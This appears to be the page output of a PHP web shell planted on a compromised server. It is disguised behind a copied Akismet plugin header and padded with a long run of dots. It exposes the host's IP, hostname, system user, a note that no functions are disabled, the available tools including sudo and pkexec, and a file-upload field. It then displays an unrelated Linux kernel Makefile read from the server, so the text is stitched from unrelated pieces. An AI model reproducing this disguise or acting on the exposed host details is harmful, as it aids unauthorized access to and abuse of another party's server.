#/** * @package Akismet */ /* Plugin Name: Akismet Anti-spam: Spam Protection Plugin URI: https://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. Version: 5.4 Requires at least: 5.8 Requires PHP: 7.2 Author: Automattic - Anti-spam Team Author URI: https://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Copyright 2005-2025 Automattic, Inc. */ // Make sure we don't expose any info if called directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
| Server IP : 62.109.13.187 / Your IP : 216.73.216.11 [ Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28 System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : mosrembit ( 6064) PHP Version : 8.2.28 Disable Function : NONE Domains : 0 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /lib/modules/3.10.0-1160.76.1.el7.x86_64/build/ |
Upload File : |
# # This Makefile generates the following header files needed to support qrwlock: # 1) include/generated/qrwlock.h (from rwlock.h) # 2) include/generated/qrwlock_types.h (from rwlock_types.h) # 3) include/generated/qrwlock_api_smp.h (from rwlock_api_smp.h) # 4) kernel/qrwlock_gen.c (from spinlock.c) # 5) lib/qrwlock_debug.c (from spinlock_debug.c) # qrwlock_h = include/generated/qrwlock.h qrwlock_types_h = include/generated/qrwlock_types.h qrwlock_api_smp_h = include/generated/qrwlock_api_smp.h qrwlock_gen_c = kernel/qrwlock_gen.c qrwlock_debug_c = lib/qrwlock_debug.c qlock_files = $(qrwlock_h) $(qrwlock_api_smp_h) $(qrwlock_types_h) \ $(qrwlock_gen_c) $(qrwlock_debug_c) define filechk_qrwlock.h (set -e; \ echo "#include <asm/qrwlock.h>"; \ sed -e "/__LINUX_SPINLOCK_H/,+2d" \ -e "s/RW/QRW/" \ -e "s/rwlock/qrwlock/g" \ -e "s/read/qread/g;s/write/qwrite/g" ) endef define filechk_qrwlock_types.h (set -e; \ echo "#include <asm-generic/qrwlock_types.h>"; \ sed -e "s/RWLOCK/QRWLOCK/;s/RW_LOCK/QRW_LOCK/" \ -e "s/rwlock/qrwlock/g" ) endef define filechk_qrwlock_api_smp.h (set -e; \ sed -e "/__LINUX_SPINLOCK_API_SMP_H/,+2d" \ -e "s/RWLOCK/QRWLOCK/" \ -e "s/rwlock_t/qrwlock_t/g" \ -e "s/read_/qread_/g;s/write_/qwrite_/g" ) endef dol := $$ define filechk_qrwlock_gen.c (set -e; \ sed -e "/BEGIN_SPINLOCK/,/END_SPINLOCK/d" \ -e '/#ifdef CONFIG_DEBUG_LOCK/,$(dol)d' \ -e "/raw_spinlock/d" \ -e "s/read/qread/g;s/write/qwrite/g" \ -e "s/rwlock/qrwlock/" ) endef define filechk_qrwlock_debug.c (set -e; \ echo "#ifdef CONFIG_QUEUED_RWLOCKS"; \ sed -e "/BEGIN_SPINLOCK/,/END_SPINLOCK/d" \ -e "/raw_spin/,/EXPORT.*raw_spin/d" \ -e "s/RW/QRW/g;s/rwlock/qrwlock/g" \ -e "s/read_/qread_/g;s/write_/qwrite_/g"; \ echo "#endif" ) endef $(qrwlock_h): include/linux/rwlock.h FORCE $(call filechk,qrwlock.h) $(qrwlock_types_h): include/linux/rwlock_types.h FORCE $(call filechk,qrwlock_types.h) $(qrwlock_api_smp_h): include/linux/rwlock_api_smp.h FORCE $(call filechk,qrwlock_api_smp.h) $(qrwlock_gen_c): kernel/spinlock.c FORCE $(call filechk,qrwlock_gen.c) $(qrwlock_debug_c): lib/spinlock_debug.c FORCE $(call filechk,qrwlock_debug.c)